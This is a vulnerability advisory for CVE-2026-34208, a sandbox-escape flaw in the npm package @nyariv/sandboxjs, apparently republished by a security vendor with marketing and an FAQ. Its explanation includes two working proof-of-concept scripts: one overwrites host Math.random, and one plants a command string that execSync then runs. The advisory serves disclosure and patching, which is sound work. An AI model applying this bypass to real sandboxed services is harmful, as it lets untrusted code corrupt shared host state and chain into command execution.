Summary
SandboxJS blocks direct assignment to global objects (for example Math.random = ...), but this protection can be bypassed through an exposed callable constructor path: this.constructor.call(target, attackerObject). Because this.constructor resolves to the internal SandboxGlobal function and Function.prototype.call is allowed, attacker code can write arbitrary properties into host global objects and persist those mutations across sandbox instances in the same process.
Details
The intended safety model relies on write-time checks in assignment operations. In assignCheck, writes are denied when the destination is marked global (obj.isGlobal), which correctly blocks straightforward payloads like Math.random = () => 1.
Reference: src/executor.ts#L215-L218
if (obj.isGlobal) {
throw new SandboxAccessError(
`Cannot ${op} property '${obj.prop.toString()}' of a global object`,
);
}
The bypass works because the dangerous write is not performed by an assignment opcode. Instead, attacker code reaches a host callable that performs writes internally. The constructor used for sandbox global objects is SandboxGlobal, implemented as a function that copies all keys from a provided object into this.
Reference: src/utils.ts#L84-L88
export const SandboxGlobal = function SandboxGlobal(this: ISandboxGlobal, globals: IGlobals) {
for (const i in globals) {
this[i] = globals[i];
}
} as any as SandboxGlobalConstructor;
At runtime, global scope this is a SandboxGlobal instance (functionThis), so this.constructor resolves to SandboxGlobal. That constructor is reachable from sandbox code, and calls through Function.prototype.call are allowed by the generic call opcode path.
References:
const sandboxGlobal = new SandboxGlobal(options.globals);
...
globalScope: new Scope(null, options.globals, sandboxGlobal),
const evl = context.evals.get(obj.context[obj.prop] as any);
let ret = evl ? evl(obj.context[obj.prop], ...vals) : (obj.context[obj.prop](...vals) as unknown);
This creates a privilege gap:
- Direct global mutation is blocked in assignment logic.
- A callable host function that performs arbitrary property writes is still reachable.
- The call path does not enforce equivalent global-mutation restrictions.
- Attacker-controlled code can choose the write target (
Math,JSON, etc.) via.call(target, payloadObject).
In practice, the payload:
const SG = this.constructor;
SG.call(Math, { random: () => 'pwned' });
overwrites host Math.random successfully. The mutation is visible immediately in host runtime and in fresh sandbox instances, proving cross-context persistence and sandbox boundary break.
PoC
Install dependency:
npm i @nyariv/[email protected]
Global write bypass with pwned marker
#!/usr/bin/env node
'use strict';
const Sandbox = require('@nyariv/sandboxjs').default;
const run = (code) => new Sandbox().compile(code)().run();
const original = Math.random;
try {
try {
run('Math.random = () => 1');
console.log('Without bypass (direct assignment): unexpectedly succeeded');
} catch (err) {
console.log('Without bypass (direct assignment): blocked ->', err.message);
}
run(`this.constructor.call(Math, { random: () => 'pwned' })`);
console.log('With bypass (host Math.random()):', Math.random());
console.log('With bypass (fresh sandbox Math.random()):', run('return Math.random()'));
} finally {
Math.random = original;
}
Expected output:
Without bypass (direct assignment): blocked -> Cannot assign property 'random' of a global object
With bypass (host Math.random()): pwned
With bypass (fresh sandbox Math.random()): pwned
With bypass (host Math.random()) proves the sandbox changed host runtime state immediately.With bypass (fresh sandbox Math.random()) proves the mutation persists across new sandbox instances, which shows cross-execution contamination.
Command id execution via host gadget
This second PoC demonstrates exploitability when host code later uses a mutated global property in a sensitive sink. It uses the POSIX id command as a harmless execution marker.
#!/usr/bin/env node
'use strict';
const Sandbox = require('@nyariv/sandboxjs').default;
const { execSync } = require('child_process');
const run = (code) => new Sandbox().compile(code)().run();
const hadCmd = Object.prototype.hasOwnProperty.call(Math, 'cmd');
const originalCmd = Math.cmd;
try {
try {
run(`Math.cmd = 'id'`);
console.log('Without bypass (direct assignment): unexpectedly succeeded');
} catch (err) {
console.log('Without bypass (direct assignment): blocked ->', err.message);
}
run(`this.constructor.call(Math, { cmd: 'id' })`);
console.log('With bypass (host command source Math.cmd):', Math.cmd);
console.log(
'With bypass + host gadget execSync(Math.cmd):',
execSync(Math.cmd, { encoding: 'utf8' }).trim(),
);
} finally {
if (hadCmd) {
Math.cmd = originalCmd;
} else {
delete Math.cmd;
}
}
Expected output:
Without bypass (direct assignment): blocked -> Cannot assign property 'cmd' of a global object
With bypass (host command source Math.cmd): id
With bypass + host gadget execSync(Math.cmd): uid=1000(mk0) gid=1000(mk0) groups=1000(mk0),...
Impact
This is a sandbox integrity escape. Untrusted code can mutate host shared global objects despite explicit global-write protections. Because these mutations persist process-wide, exploitation can poison behavior for other requests, tenants, or subsequent sandbox runs. Depending on host application usage of mutated built-ins, this can be chained into broader compromise, including control-flow hijack in application logic that assumes trusted built-in behavior.
CVE-2026-34208 has a CVSS score of 10.0 (Critical). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.8.36); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-34208? CVE-2026-34208 is a critical-severity security vulnerability in @nyariv/sandboxjs (npm), affecting versions < 0.8.36. It is fixed in 0.8.36.
- How severe is CVE-2026-34208? CVE-2026-34208 has a CVSS score of 10.0 (Critical). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of @nyariv/sandboxjs are affected by CVE-2026-34208? @nyariv/sandboxjs (npm) versions < 0.8.36 is affected.
- Is there a fix for CVE-2026-34208? Yes. CVE-2026-34208 is fixed in 0.8.36. Upgrade to this version or later.
- Is CVE-2026-34208 exploitable, and should I be worried? Whether CVE-2026-34208 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-34208 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-34208? Upgrade
@nyariv/sandboxjsto 0.8.36 or later.